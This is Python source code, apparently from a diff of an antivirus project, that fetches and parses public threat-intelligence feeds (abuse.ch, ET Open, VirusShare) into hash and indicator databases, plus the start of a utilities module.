"""Abstract base class for AYN threat-intelligence feeds."""
from __future__ import annotations
import logging
import time
from abc import ABC, abstractmethod
from datetime import datetime
from typing import Any, Dict, List, Optional
logger = logging.getLogger(__name__)
class BaseFeed(ABC):
"""Common interface for all external threat-intelligence feeds.
Provides rate-limiting, last-updated tracking, and a uniform
``fetch()`` contract so the :class:`SignatureManager` can orchestrate
updates without knowing feed internals.
Parameters
----------
rate_limit_seconds:
Minimum interval between successive HTTP requests to the same feed.
"""
def __init__(self, rate_limit_seconds: float = 2.0) -> None:
self._rate_limit = rate_limit_seconds
self._last_request_time: float = 0.0
self._last_updated: Optional[datetime] = None
# ------------------------------------------------------------------
# Identity
# ------------------------------------------------------------------
@abstractmethod
def get_name(self) -> str:
"""Return a short, human-readable feed name."""
...
# ------------------------------------------------------------------
# Fetching
# ------------------------------------------------------------------
@abstractmethod
def fetch(self) -> List[Dict[str, Any]]:
"""Download the latest entries from the feed.
Returns a list of dicts. The exact keys depend on the feed type
(hashes, IOCs, rules, etc.). The :class:`SignatureManager` is
responsible for routing each entry to the correct database.
"""
...
# ------------------------------------------------------------------
# State
# ------------------------------------------------------------------
@property
def last_updated(self) -> Optional[datetime]:
"""Timestamp of the most recent successful fetch."""
return self._last_updated
def _mark_updated(self) -> None:
"""Record the current time as the last-successful-fetch timestamp."""
self._last_updated = datetime.utcnow()
# ------------------------------------------------------------------
# Rate limiting
# ------------------------------------------------------------------
def _rate_limit_wait(self) -> None:
"""Block until the rate-limit window has elapsed."""
elapsed = time.monotonic() - self._last_request_time
remaining = self._rate_limit - elapsed
if remaining > 0:
logger.debug("[%s] Rate-limiting: sleeping %.1fs", self.get_name(), remaining)
time.sleep(remaining)
self._last_request_time = time.monotonic()
# ------------------------------------------------------------------
# Logging helpers
# ------------------------------------------------------------------
def _log(self, msg: str, *args: Any) -> None:
logger.info("[%s] " + msg, self.get_name(), *args)
def _warn(self, msg: str, *args: Any) -> None:
logger.warning("[%s] " + msg, self.get_name(), *args)
def _error(self, msg: str, *args: Any) -> None:
logger.error("[%s] " + msg, self.get_name(), *args)

View File

@@ -0,0 +1,124 @@
"""Emerging Threats (ET Open) feed for AYN Antivirus.
Parses community Suricata / Snort rules from Proofpoint's ET Open project
to extract IOCs (IP addresses and domains) referenced in active detection
rules.
Source: https://rules.emergingthreats.net/open/suricata/rules/
"""
from __future__ import annotations
import logging
import re
from typing import Any, Dict, List, Set
import requests
from ayn_antivirus.signatures.feeds.base_feed import BaseFeed
logger = logging.getLogger(__name__)
# We focus on the compromised-IP and C2 rule files.
_RULE_URLS = [
"https://rules.emergingthreats.net/open/suricata/rules/compromised-ips.txt",
"https://rules.emergingthreats.net/open/suricata/rules/botcc.rules",
"https://rules.emergingthreats.net/open/suricata/rules/ciarmy.rules",
"https://rules.emergingthreats.net/open/suricata/rules/emerging-malware.rules",
]
_TIMEOUT = 30
# Regex patterns to extract IPs and domains from rule bodies.
_RE_IPV4 = re.compile(r"\b(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\b")
_RE_DOMAIN = re.compile(
r'content:"([a-zA-Z0-9](?:[a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?'
r'(?:\.[a-zA-Z0-9](?:[a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?)*'
r'\.[a-zA-Z]{2,})"'
)
# Private / non-routable ranges to exclude from IP results.
_PRIVATE_PREFIXES = (
"10.", "127.", "172.16.", "172.17.", "172.18.", "172.19.",
"172.20.", "172.21.", "172.22.", "172.23.", "172.24.", "172.25.",
"172.26.", "172.27.", "172.28.", "172.29.", "172.30.", "172.31.",
"192.168.", "0.", "255.", "224.",
)
class EmergingThreatsFeed(BaseFeed):
"""Parse ET Open rule files to extract malicious IPs and domains."""
def get_name(self) -> str:
return "emergingthreats"
def fetch(self) -> List[Dict[str, Any]]:
"""Download and parse ET Open rules, returning IOC dicts.
Each dict has: ``ioc_type`` (``"ip"`` or ``"domain"``), ``value``,
``threat_name``, ``type``, ``source``.
"""
self._log("Downloading ET Open rule files")
all_ips: Set[str] = set()
all_domains: Set[str] = set()
for url in _RULE_URLS:
self._rate_limit_wait()
try:
resp = requests.get(url, timeout=_TIMEOUT)
resp.raise_for_status()
text = resp.text
except requests.RequestException as exc:
self._warn("Failed to fetch %s: %s", url, exc)
continue
# Extract IPs.
if url.endswith(".txt"):
# Plain text IP list (one per line).
for line in text.splitlines():
line = line.strip()
if not line or line.startswith("#"):
continue
match = _RE_IPV4.match(line)
if match:
ip = match.group(1)
if not ip.startswith(_PRIVATE_PREFIXES):
all_ips.add(ip)
else:
# Suricata rule file — extract IPs from rule body.
for ip_match in _RE_IPV4.finditer(text):
ip = ip_match.group(1)
if not ip.startswith(_PRIVATE_PREFIXES):
all_ips.add(ip)
# Extract domains from content matches.
for domain_match in _RE_DOMAIN.finditer(text):
domain = domain_match.group(1).lower()
# Filter out very short or generic patterns.
if "." in domain and len(domain) > 4:
all_domains.add(domain)
# Build result list.
results: List[Dict[str, Any]] = []
for ip in all_ips:
results.append({
"ioc_type": "ip",
"value": ip,
"threat_name": "ET.Compromised",
"type": "C2",
"source": "emergingthreats",
"details": "IP from Emerging Threats ET Open rules",
})
for domain in all_domains:
results.append({
"ioc_type": "domain",
"value": domain,
"threat_name": "ET.MaliciousDomain",
"type": "C2",
"source": "emergingthreats",
"details": "Domain extracted from ET Open Suricata rules",
})
self._log("Extracted %d IP(s) and %d domain(s)", len(all_ips), len(all_domains))
self._mark_updated()
return results

View File

@@ -0,0 +1,73 @@
"""Feodo Tracker feed for AYN Antivirus.
Downloads the recommended IP blocklist from the abuse.ch Feodo Tracker
project. The list contains IP addresses of verified botnet C2 servers
(Dridex, Emotet, TrickBot, QakBot, etc.).
Source: https://feodotracker.abuse.ch/blocklist/
"""
from __future__ import annotations
import logging
from typing import Any, Dict, List
import requests
from ayn_antivirus.signatures.feeds.base_feed import BaseFeed
logger = logging.getLogger(__name__)
_BLOCKLIST_URL = "https://feodotracker.abuse.ch/downloads/ipblocklist_aggressive.txt"
_TIMEOUT = 30
class FeodoTrackerFeed(BaseFeed):
"""Fetch C2 server IPs from the Feodo Tracker blocklist."""
def get_name(self) -> str:
return "feodotracker"
def fetch(self) -> List[Dict[str, Any]]:
"""Download the recommended IP blocklist.
Returns a list of dicts, each with:
``ioc_type="ip"``, ``value``, ``threat_name``, ``type``, ``source``.
"""
self._rate_limit_wait()
self._log("Downloading Feodo Tracker IP blocklist")
try:
resp = requests.get(_BLOCKLIST_URL, timeout=_TIMEOUT)
resp.raise_for_status()
except requests.RequestException as exc:
self._error("Download failed: %s", exc)
return []
results: List[Dict[str, Any]] = []
for line in resp.text.splitlines():
line = line.strip()
if not line or line.startswith("#"):
continue
# Basic IPv4 validation.
parts = line.split(".")
if len(parts) != 4:
continue
try:
if not all(0 <= int(p) <= 255 for p in parts):
continue
except ValueError:
continue
results.append({
"ioc_type": "ip",
"value": line,
"threat_name": "Botnet.C2.Feodo",
"type": "C2",
"source": "feodotracker",
"details": "Verified botnet C2 IP from Feodo Tracker",
})
self._log("Fetched %d C2 IP(s)", len(results))
self._mark_updated()
return results

View File

@@ -0,0 +1,174 @@
"""MalwareBazaar feed for AYN Antivirus.
Fetches recent malware sample hashes from the abuse.ch MalwareBazaar
CSV export (free, no API key required).
CSV export: https://bazaar.abuse.ch/export/
"""
from __future__ import annotations
import csv
import io
import logging
from typing import Any, Dict, List, Optional
import requests
from ayn_antivirus.signatures.feeds.base_feed import BaseFeed
logger = logging.getLogger(__name__)
_CSV_RECENT_URL = "https://bazaar.abuse.ch/export/csv/recent/"
_CSV_FULL_URL = "https://bazaar.abuse.ch/export/csv/full/"
_API_URL = "https://mb-api.abuse.ch/api/v1/"
_TIMEOUT = 60
class MalwareBazaarFeed(BaseFeed):
"""Fetch malware SHA-256 hashes from MalwareBazaar.
Uses the free CSV export by default. Falls back to JSON API
if an api_key is provided.
"""
def __init__(self, api_key: Optional[str] = None, **kwargs: Any) -> None:
super().__init__(**kwargs)
self.api_key = api_key
def get_name(self) -> str:
return "malwarebazaar"
def fetch(self) -> List[Dict[str, Any]]:
"""Fetch recent malware hashes from CSV export."""
return self._fetch_csv(_CSV_RECENT_URL)
def fetch_recent(self, hours: int = 24) -> List[Dict[str, Any]]:
"""Fetch recent samples. CSV export returns last ~1000 samples."""
return self._fetch_csv(_CSV_RECENT_URL)
def _fetch_csv(self, url: str) -> List[Dict[str, Any]]:
"""Download and parse the MalwareBazaar CSV export."""
self._rate_limit_wait()
self._log("Fetching hashes from %s", url)
try:
resp = requests.get(url, timeout=_TIMEOUT)
resp.raise_for_status()
except requests.RequestException as exc:
self._error("CSV download failed: %s", exc)
return []
results: List[Dict[str, Any]] = []
lines = [
line for line in resp.text.splitlines()
if line.strip() and not line.startswith("#")
]
reader = csv.reader(io.StringIO("\n".join(lines)))
for row in reader:
if len(row) < 8:
continue
# CSV columns:
# 0: first_seen, 1: sha256, 2: md5, 3: sha1,
# 4: reporter, 5: filename, 6: file_type, 7: mime_type,
# 8+: signature, ...
sha256 = row[1].strip().strip('"')
if not sha256 or len(sha256) != 64:
continue
filename = row[5].strip().strip('"') if len(row) > 5 else ""
file_type = row[6].strip().strip('"') if len(row) > 6 else ""
signature = row[8].strip().strip('"') if len(row) > 8 else ""
reporter = row[4].strip().strip('"') if len(row) > 4 else ""
threat_name = (
signature
if signature and signature not in ("null", "n/a", "None", "")
else f"Malware.{_map_type_name(file_type)}"
)
results.append({
"hash": sha256.lower(),
"threat_name": threat_name,
"threat_type": _map_type(file_type),
"severity": "HIGH",
"source": "malwarebazaar",
"details": (
f"file={filename}, type={file_type}, reporter={reporter}"
),
})
self._log("Parsed %d hash signature(s) from CSV", len(results))
self._mark_updated()
return results
def fetch_by_tag(self, tag: str) -> List[Dict[str, Any]]:
"""Fetch samples by tag (requires API key, falls back to empty)."""
if not self.api_key:
self._warn("fetch_by_tag requires API key")
return []
self._rate_limit_wait()
payload = {"query": "get_taginfo", "tag": tag, "limit": 100}
if self.api_key:
payload["api_key"] = self.api_key
try:
resp = requests.post(_API_URL, data=payload, timeout=_TIMEOUT)
resp.raise_for_status()
data = resp.json()
except requests.RequestException as exc:
self._error("API request failed: %s", exc)
return []
if data.get("query_status") != "ok":
return []
results = []
for entry in data.get("data", []):
sha256 = entry.get("sha256_hash", "")
if not sha256:
continue
results.append({
"hash": sha256.lower(),
"threat_name": entry.get("signature") or f"Malware.{tag}",
"threat_type": _map_type(entry.get("file_type", "")),
"severity": "HIGH",
"source": "malwarebazaar",
"details": f"tag={tag}, file_type={entry.get('file_type', '')}",
})
self._mark_updated()
return results
def _map_type(file_type: str) -> str:
ft = file_type.lower()
if any(x in ft for x in ("exe", "dll", "elf", "pe32")):
return "MALWARE"
if any(x in ft for x in ("doc", "xls", "pdf", "rtf")):
return "MALWARE"
if any(x in ft for x in ("script", "js", "vbs", "ps1", "bat", "sh")):
return "MALWARE"
return "MALWARE"
def _map_type_name(file_type: str) -> str:
"""Map file type to a readable threat name suffix."""
ft = file_type.lower().strip()
m = {
"exe": "Win32.Executable", "dll": "Win32.DLL", "msi": "Win32.Installer",
"elf": "Linux.ELF", "so": "Linux.SharedLib",
"doc": "Office.Document", "docx": "Office.Document",
"xls": "Office.Spreadsheet", "xlsx": "Office.Spreadsheet",
"pdf": "PDF.Document", "rtf": "Office.RTF",
"js": "Script.JavaScript", "vbs": "Script.VBScript",
"ps1": "Script.PowerShell", "bat": "Script.Batch",
"sh": "Script.Shell", "py": "Script.Python",
"apk": "Android.APK", "ipa": "iOS.IPA",
"app": "macOS.App", "pkg": "macOS.Pkg", "dmg": "macOS.DMG",
"rar": "Archive.RAR", "zip": "Archive.ZIP",
"7z": "Archive.7Z", "tar": "Archive.TAR", "gz": "Archive.GZ",
"iso": "DiskImage.ISO", "img": "DiskImage.IMG",
}
return m.get(ft, "Generic")

View File

@@ -0,0 +1,117 @@
"""ThreatFox feed for AYN Antivirus.
Fetches IOCs (IPs, domains, URLs, hashes) from the abuse.ch ThreatFox
CSV export (free, no API key required).
CSV export: https://threatfox.abuse.ch/export/
"""
from __future__ import annotations
import csv
import io
import logging
from typing import Any, Dict, List
import requests
from ayn_antivirus.signatures.feeds.base_feed import BaseFeed
logger = logging.getLogger(__name__)
_CSV_RECENT_URL = "https://threatfox.abuse.ch/export/csv/recent/"
_CSV_FULL_URL = "https://threatfox.abuse.ch/export/csv/full/"
_TIMEOUT = 60
class ThreatFoxFeed(BaseFeed):
"""Fetch IOCs from ThreatFox CSV export."""
def get_name(self) -> str:
return "threatfox"
def fetch(self) -> List[Dict[str, Any]]:
return self.fetch_recent()
def fetch_recent(self, days: int = 7) -> List[Dict[str, Any]]:
"""Fetch recent IOCs from CSV export."""
self._rate_limit_wait()
self._log("Fetching IOCs from CSV export")
try:
resp = requests.get(_CSV_RECENT_URL, timeout=_TIMEOUT)
resp.raise_for_status()
except requests.RequestException as exc:
self._error("CSV download failed: %s", exc)
return []
results: List[Dict[str, Any]] = []
lines = [l for l in resp.text.splitlines() if l.strip() and not l.startswith("#")]
reader = csv.reader(io.StringIO("\n".join(lines)))
for row in reader:
if len(row) < 6:
continue
# CSV: 0:first_seen, 1:ioc_id, 2:ioc_value, 3:ioc_type,
# 4:threat_type, 5:malware, 6:malware_alias,
# 7:malware_printable, 8:last_seen, 9:confidence,
# 10:reference, 11:tags, 12:reporter
ioc_value = row[2].strip().strip('"')
ioc_type_raw = row[3].strip().strip('"').lower()
threat_type = row[4].strip().strip('"') if len(row) > 4 else ""
malware = row[5].strip().strip('"') if len(row) > 5 else ""
malware_printable = row[7].strip().strip('"') if len(row) > 7 else ""
confidence = row[9].strip().strip('"') if len(row) > 9 else "0"
if not ioc_value:
continue
# Classify IOC type
ioc_type = _classify_ioc(ioc_type_raw, ioc_value)
threat_name = malware_printable or malware or "Unknown"
# Hash IOCs go into hash DB
if ioc_type == "hash":
results.append({
"hash": ioc_value.lower(),
"threat_name": threat_name,
"threat_type": "MALWARE",
"severity": "HIGH",
"source": "threatfox",
"details": f"threat={threat_type}, confidence={confidence}",
})
else:
clean_value = ioc_value
if ioc_type == "ip" and ":" in ioc_value:
clean_value = ioc_value.rsplit(":", 1)[0]
results.append({
"ioc_type": ioc_type,
"value": clean_value,
"threat_name": threat_name,
"type": threat_type or "C2",
"source": "threatfox",
"confidence": int(confidence) if confidence.isdigit() else 0,
})
self._log("Fetched %d IOC(s)", len(results))
self._mark_updated()
return results
def _classify_ioc(raw_type: str, value: str) -> str:
if "ip" in raw_type:
return "ip"
if "domain" in raw_type:
return "domain"
if "url" in raw_type:
return "url"
if "hash" in raw_type or "sha256" in raw_type or "md5" in raw_type:
return "hash"
if value.startswith("http://") or value.startswith("https://"):
return "url"
if len(value) == 64 and all(c in "0123456789abcdef" for c in value.lower()):
return "hash"
if ":" in value and value.replace(".", "").replace(":", "").isdigit():
return "ip"
return "domain"

View File

@@ -0,0 +1,131 @@
"""URLhaus feed for AYN Antivirus.
Fetches malicious URLs and payload hashes from the abuse.ch URLhaus
CSV/text exports (free, no API key required).
"""
from __future__ import annotations
import csv
import io
import logging
from typing import Any, Dict, List
import requests
from ayn_antivirus.signatures.feeds.base_feed import BaseFeed
logger = logging.getLogger(__name__)
_CSV_RECENT_URL = "https://urlhaus.abuse.ch/downloads/csv_recent/"
_TEXT_ONLINE_URL = "https://urlhaus.abuse.ch/downloads/text_online/"
_PAYLOAD_RECENT_URL = "https://urlhaus.abuse.ch/downloads/payloads_recent/"
_TIMEOUT = 60
class URLHausFeed(BaseFeed):
"""Fetch malware URLs and payload hashes from URLhaus."""
def get_name(self) -> str:
return "urlhaus"
def fetch(self) -> List[Dict[str, Any]]:
results = self.fetch_recent()
results.extend(self.fetch_payloads())
return results
def fetch_recent(self) -> List[Dict[str, Any]]:
"""Fetch recent malicious URLs from CSV export."""
self._rate_limit_wait()
self._log("Fetching recent URLs from CSV export")
try:
resp = requests.get(_CSV_RECENT_URL, timeout=_TIMEOUT)
resp.raise_for_status()
except requests.RequestException as exc:
self._error("CSV download failed: %s", exc)
return []
results: List[Dict[str, Any]] = []
lines = [l for l in resp.text.splitlines() if l.strip() and not l.startswith("#")]
reader = csv.reader(io.StringIO("\n".join(lines)))
for row in reader:
if len(row) < 4:
continue
# 0:id, 1:dateadded, 2:url, 3:url_status, 4:threat, 5:tags, 6:urlhaus_link, 7:reporter
url = row[2].strip().strip('"')
if not url or not url.startswith("http"):
continue
threat = row[4].strip().strip('"') if len(row) > 4 else ""
results.append({
"ioc_type": "url",
"value": url,
"threat_name": threat if threat and threat != "None" else "Malware.Distribution",
"type": "malware_distribution",
"source": "urlhaus",
})
self._log("Fetched %d URL(s)", len(results))
self._mark_updated()
return results
def fetch_payloads(self) -> List[Dict[str, Any]]:
"""Fetch recent payload hashes (SHA256) from URLhaus."""
self._rate_limit_wait()
self._log("Fetching payload hashes")
try:
resp = requests.get(_PAYLOAD_RECENT_URL, timeout=_TIMEOUT)
resp.raise_for_status()
except requests.RequestException as exc:
self._error("Payload download failed: %s", exc)
return []
results: List[Dict[str, Any]] = []
lines = [l for l in resp.text.splitlines() if l.strip() and not l.startswith("#")]
reader = csv.reader(io.StringIO("\n".join(lines)))
for row in reader:
if len(row) < 7:
continue
# 0:first_seen, 1:url, 2:file_type, 3:md5, 4:sha256, 5:signature
sha256 = row[4].strip().strip('"') if len(row) > 4 else ""
if not sha256 or len(sha256) != 64:
continue
sig = row[5].strip().strip('"') if len(row) > 5 else ""
results.append({
"hash": sha256.lower(),
"threat_name": sig if sig and sig != "None" else "Malware.URLhaus.Payload",
"threat_type": "MALWARE",
"severity": "HIGH",
"source": "urlhaus",
"details": f"file_type={row[2].strip()}" if len(row) > 2 else "",
})
self._log("Fetched %d payload hash(es)", len(results))
return results
def fetch_active(self) -> List[Dict[str, Any]]:
"""Fetch currently-active malware URLs."""
self._rate_limit_wait()
try:
resp = requests.get(_TEXT_ONLINE_URL, timeout=_TIMEOUT)
resp.raise_for_status()
except requests.RequestException as exc:
self._error("Download failed: %s", exc)
return []
results = []
for line in resp.text.splitlines():
line = line.strip()
if not line or line.startswith("#"):
continue
results.append({
"ioc_type": "url",
"value": line,
"threat_name": "Malware.Distribution.Active",
"type": "malware_distribution",
"source": "urlhaus",
})
self._log("Fetched %d active URL(s)", len(results))
self._mark_updated()
return results

View File

@@ -0,0 +1,114 @@
"""VirusShare feed for AYN Antivirus.
Downloads MD5 hash lists from VirusShare.com — one of the largest
free malware hash databases. Each list contains 65,536 MD5 hashes
of known malware samples (.exe, .dll, .rar, .doc, .pdf, .app, etc).
https://virusshare.com/hashes
"""
from __future__ import annotations
import logging
import os
from pathlib import Path
from typing import Any, Dict, List, Optional
import requests
from ayn_antivirus.signatures.feeds.base_feed import BaseFeed
logger = logging.getLogger(__name__)
_BASE_URL = "https://virusshare.com/hashfiles/VirusShare_{:05d}.md5"
_TIMEOUT = 30
_STATE_FILE = "/var/lib/ayn-antivirus/.virusshare_last"
class VirusShareFeed(BaseFeed):
"""Fetch malware MD5 hashes from VirusShare.
Tracks the last downloaded list number so incremental updates
only fetch new lists.
"""
def __init__(self, **kwargs: Any) -> None:
super().__init__(**kwargs)
self._last_list = self._load_state()
def get_name(self) -> str:
return "virusshare"
def fetch(self) -> List[Dict[str, Any]]:
"""Fetch new hash lists since last update."""
return self.fetch_new_lists(max_lists=3)
def fetch_new_lists(self, max_lists: int = 3) -> List[Dict[str, Any]]:
"""Download up to max_lists new VirusShare hash files."""
results: List[Dict[str, Any]] = []
start = self._last_list + 1
fetched = 0
for i in range(start, start + max_lists):
self._rate_limit_wait()
url = _BASE_URL.format(i)
self._log("Fetching VirusShare_%05d", i)
try:
resp = requests.get(url, timeout=_TIMEOUT)
if resp.status_code == 404:
self._log("VirusShare_%05d not found — at latest", i)
break
resp.raise_for_status()
except requests.RequestException as exc:
self._error("Failed to fetch list %d: %s", i, exc)
break
hashes = [
line.strip()
for line in resp.text.splitlines()
if line.strip() and not line.startswith("#") and len(line.strip()) == 32
]
for h in hashes:
results.append({
"hash": h.lower(),
"threat_name": "Malware.VirusShare",
"threat_type": "MALWARE",
"severity": "HIGH",
"source": "virusshare",
"details": f"md5,list={i:05d}",
})
self._last_list = i
self._save_state(i)
fetched += 1
self._log("VirusShare_%05d: %d hashes", i, len(hashes))
self._log("Fetched %d list(s), %d total hashes", fetched, len(results))
if results:
self._mark_updated()
return results
def fetch_initial(self, start_list: int = 470, count: int = 11) -> List[Dict[str, Any]]:
"""Bulk download for initial setup."""
old = self._last_list
self._last_list = start_list - 1
results = self.fetch_new_lists(max_lists=count)
if not results:
self._last_list = old
return results
@staticmethod
def _load_state() -> int:
try:
return int(Path(_STATE_FILE).read_text().strip())
except Exception:
return 480 # Default: start after list 480
@staticmethod
def _save_state(n: int) -> None:
try:
Path(_STATE_FILE).write_text(str(n))
except Exception:
pass

View File

@@ -0,0 +1,320 @@
"""Signature manager for AYN Antivirus.
Orchestrates all threat-intelligence feeds, routes fetched entries into the
correct database (hash DB or IOC DB), and exposes high-level update /
status / integrity operations for the CLI and scheduler.
"""
from __future__ import annotations
import logging
import sqlite3
import threading
import time
from datetime import datetime
from pathlib import Path
from typing import Any, Dict, List, Optional
from ayn_antivirus.config import Config
from ayn_antivirus.constants import DEFAULT_DB_PATH
from ayn_antivirus.core.event_bus import EventType, event_bus
from ayn_antivirus.signatures.db.hash_db import HashDatabase
from ayn_antivirus.signatures.db.ioc_db import IOCDatabase
from ayn_antivirus.signatures.feeds.base_feed import BaseFeed
from ayn_antivirus.signatures.feeds.emergingthreats import EmergingThreatsFeed
from ayn_antivirus.signatures.feeds.feodotracker import FeodoTrackerFeed
from ayn_antivirus.signatures.feeds.malwarebazaar import MalwareBazaarFeed
from ayn_antivirus.signatures.feeds.threatfox import ThreatFoxFeed
from ayn_antivirus.signatures.feeds.urlhaus import URLHausFeed
from ayn_antivirus.signatures.feeds.virusshare import VirusShareFeed
logger = logging.getLogger(__name__)
class SignatureManager:
"""Central coordinator for signature / IOC updates.
Parameters
----------
config:
Application configuration.
db_path:
Override the database path from config.
"""
def __init__(
self,
config: Config,
db_path: Optional[str | Path] = None,
) -> None:
self.config = config
self._db_path = Path(db_path or config.db_path)
# Databases.
self.hash_db = HashDatabase(self._db_path)
self.ioc_db = IOCDatabase(self._db_path)
# Feeds — instantiated lazily so missing API keys don't crash init.
self._feeds: Dict[str, BaseFeed] = {}
self._init_feeds()
# Auto-update thread handle.
self._auto_update_stop = threading.Event()
self._auto_update_thread: Optional[threading.Thread] = None
# ------------------------------------------------------------------
# Feed registry
# ------------------------------------------------------------------
def _init_feeds(self) -> None:
"""Register the built-in feeds."""
api_keys = self.config.api_keys
self._feeds["malwarebazaar"] = MalwareBazaarFeed(
api_key=api_keys.get("malwarebazaar"),
)
self._feeds["threatfox"] = ThreatFoxFeed()
self._feeds["urlhaus"] = URLHausFeed()
self._feeds["feodotracker"] = FeodoTrackerFeed()
self._feeds["emergingthreats"] = EmergingThreatsFeed()
self._feeds["virusshare"] = VirusShareFeed()
@property
def feed_names(self) -> List[str]:
return list(self._feeds.keys())
# ------------------------------------------------------------------
# Update operations
# ------------------------------------------------------------------
def update_all(self) -> Dict[str, Any]:
"""Fetch from every registered feed and store results.
Returns a summary dict with per-feed statistics.
"""
self.hash_db.initialize()
self.ioc_db.initialize()
summary: Dict[str, Any] = {"feeds": {}, "total_new": 0, "errors": []}
for name, feed in self._feeds.items():
try:
stats = self._update_single(name, feed)
summary["feeds"][name] = stats
summary["total_new"] += stats.get("inserted", 0)
except Exception as exc:
logger.exception("Feed '%s' failed", name)
summary["feeds"][name] = {"error": str(exc)}
summary["errors"].append(name)
event_bus.publish(EventType.SIGNATURE_UPDATED, {
"source": "manager",
"feeds_updated": len(summary["feeds"]) - len(summary["errors"]),
"total_new": summary["total_new"],
})
logger.info(
"Signature update complete: %d feed(s), %d new entries, %d error(s)",
len(self._feeds),
summary["total_new"],
len(summary["errors"]),
)
return summary
def update_feed(self, feed_name: str) -> Dict[str, Any]:
"""Update a single feed by name.
Raises ``KeyError`` if *feed_name* is not registered.
"""
if feed_name not in self._feeds:
raise KeyError(f"Unknown feed: {feed_name!r} (available: {self.feed_names})")
self.hash_db.initialize()
self.ioc_db.initialize()
feed = self._feeds[feed_name]
stats = self._update_single(feed_name, feed)
event_bus.publish(EventType.SIGNATURE_UPDATED, {
"source": "manager",
"feed": feed_name,
"inserted": stats.get("inserted", 0),
})
return stats
def _update_single(self, name: str, feed: BaseFeed) -> Dict[str, Any]:
"""Fetch from one feed and route entries to the right DB."""
logger.info("Updating feed: %s", name)
entries = feed.fetch()
hashes_added = 0
ips_added = 0
domains_added = 0
urls_added = 0
# Classify and batch entries.
hash_rows = []
ip_rows = []
domain_rows = []
url_rows = []
for entry in entries:
ioc_type = entry.get("ioc_type")
if ioc_type is None:
# Hash-based entry (from MalwareBazaar).
hash_rows.append((
entry.get("hash", ""),
entry.get("threat_name", ""),
entry.get("threat_type", "MALWARE"),
entry.get("severity", "HIGH"),
entry.get("source", name),
entry.get("details", ""),
))
elif ioc_type == "ip":
ip_rows.append((
entry.get("value", ""),
entry.get("threat_name", ""),
entry.get("type", "C2"),
entry.get("source", name),
))
elif ioc_type == "domain":
domain_rows.append((
entry.get("value", ""),
entry.get("threat_name", ""),
entry.get("type", "C2"),
entry.get("source", name),
))
elif ioc_type == "url":
url_rows.append((
entry.get("value", ""),
entry.get("threat_name", ""),
entry.get("type", "malware_distribution"),
entry.get("source", name),
))
if hash_rows:
hashes_added = self.hash_db.bulk_add(hash_rows)
if ip_rows:
ips_added = self.ioc_db.bulk_add_ips(ip_rows)
if domain_rows:
domains_added = self.ioc_db.bulk_add_domains(domain_rows)
if url_rows:
urls_added = self.ioc_db.bulk_add_urls(url_rows)
total = hashes_added + ips_added + domains_added + urls_added
# Persist last-update timestamp.
self.hash_db.set_meta(f"feed_{name}_updated", datetime.utcnow().isoformat())
logger.info(
"Feed '%s': %d hashes, %d IPs, %d domains, %d URLs",
name, hashes_added, ips_added, domains_added, urls_added,
)
return {
"feed": name,
"fetched": len(entries),
"inserted": total,
"hashes": hashes_added,
"ips": ips_added,
"domains": domains_added,
"urls": urls_added,
}
# ------------------------------------------------------------------
# Status
# ------------------------------------------------------------------
def get_status(self) -> Dict[str, Any]:
"""Return per-feed last-update times and aggregate stats."""
self.hash_db.initialize()
self.ioc_db.initialize()
feed_status: Dict[str, Any] = {}
for name in self._feeds:
last = self.hash_db.get_meta(f"feed_{name}_updated")
feed_status[name] = {
"last_updated": last,
}
return {
"db_path": str(self._db_path),
"hash_count": self.hash_db.count(),
"hash_stats": self.hash_db.get_stats(),
"ioc_stats": self.ioc_db.get_stats(),
"feeds": feed_status,
}
# ------------------------------------------------------------------
# Auto-update
# ------------------------------------------------------------------
def auto_update(self, interval_hours: int = 6) -> None:
"""Start a background thread that periodically calls :meth:`update_all`.
Call :meth:`stop_auto_update` to stop the thread.
"""
if self._auto_update_thread and self._auto_update_thread.is_alive():
logger.warning("Auto-update thread is already running")
return
self._auto_update_stop.clear()
def _loop() -> None:
logger.info("Auto-update started (every %d hours)", interval_hours)
while not self._auto_update_stop.is_set():
try:
self.update_all()
except Exception:
logger.exception("Auto-update cycle failed")
self._auto_update_stop.wait(timeout=interval_hours * 3600)
logger.info("Auto-update stopped")
self._auto_update_thread = threading.Thread(
target=_loop, name="ayn-auto-update", daemon=True
)
self._auto_update_thread.start()
def stop_auto_update(self) -> None:
"""Signal the auto-update thread to stop."""
self._auto_update_stop.set()
if self._auto_update_thread:
self._auto_update_thread.join(timeout=5)
# ------------------------------------------------------------------
# Integrity
# ------------------------------------------------------------------
def verify_db_integrity(self) -> Dict[str, Any]:
"""Run ``PRAGMA integrity_check`` on the database.
Returns a dict with ``ok`` (bool) and ``details`` (str).
"""
self.hash_db.initialize()
try:
result = self.hash_db.conn.execute("PRAGMA integrity_check").fetchone()
ok = result[0] == "ok" if result else False
detail = result[0] if result else "no result"
except sqlite3.DatabaseError as exc:
ok = False
detail = str(exc)
status = {"ok": ok, "details": detail}
if not ok:
logger.error("Database integrity check FAILED: %s", detail)
else:
logger.info("Database integrity check passed")
return status
# ------------------------------------------------------------------
# Cleanup
# ------------------------------------------------------------------
def close(self) -> None:
"""Stop background threads and close databases."""
self.stop_auto_update()
self.hash_db.close()
self.ioc_db.close()

View File

@@ -0,0 +1,179 @@
"""General-purpose utility functions for AYN Antivirus."""
from __future__ import annotations
import hashlib
import os
import platform
import re
import socket
import uuid
from datetime import timedelta
from pathlib import Path
from typing import Any, Dict
import psutil
from ayn_antivirus.constants import SCAN_CHUNK_SIZE
# ---------------------------------------------------------------------------
# Human-readable formatting
# ---------------------------------------------------------------------------
def format_size(size_bytes: int | float) -> str:
"""Convert bytes to a human-readable string (e.g. ``"14.2 MB"``)."""
for unit in ("B", "KB", "MB", "GB", "TB"):
if abs(size_bytes) < 1024:
return f"{size_bytes:.1f} {unit}"
size_bytes /= 1024
return f"{size_bytes:.1f} PB"
def format_duration(seconds: float) -> str:
"""Convert seconds to a human-readable duration (e.g. ``"1h 23m 45s"``)."""
if seconds < 0:
return "0s"
td = timedelta(seconds=int(seconds))
parts = []
total_secs = int(td.total_seconds())
hours, rem = divmod(total_secs, 3600)
minutes, secs = divmod(rem, 60)
if hours:
parts.append(f"{hours}h")
if minutes:
parts.append(f"{minutes}m")
parts.append(f"{secs}s")
return " ".join(parts)
# ---------------------------------------------------------------------------
# Privilege check
# ---------------------------------------------------------------------------
def is_root() -> bool:
"""Return ``True`` if the current process is running as root (UID 0)."""
return os.geteuid() == 0
# ---------------------------------------------------------------------------
# System information
# ---------------------------------------------------------------------------
